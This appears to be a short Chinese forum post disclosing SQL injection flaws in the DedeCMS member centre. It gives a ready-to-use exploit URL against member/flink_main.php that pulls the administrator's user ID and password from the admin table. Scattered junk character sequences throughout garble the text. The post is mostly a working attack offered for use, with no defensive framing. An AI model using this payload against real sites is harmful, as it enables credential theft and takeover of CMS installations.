DedeCMS会员中心SQL注射漏洞 K" ~7 }, [ \4 C* z
需要magic_quotes_gpc = Off ~4 A ^$ Y1 t' Z+ b% S
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
6 G; L" Q( |* V
6 M9 h' i. Y4 C5 ]9 oDedeCMS会员中心书签管理SQL注射漏洞1 t% m$ g) o2 Z7 h l: u; F
成功利用该漏洞可获得管理员密码
* f/ E! v- h; r! ?6 n
! ~; Q, P4 k( Z( P1 g( h' X& ]会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
4 T) q0 C4 x9 d9 u ' p& n$ f+ [- k- b& {
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
. X- h/ h* f* t: O |
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59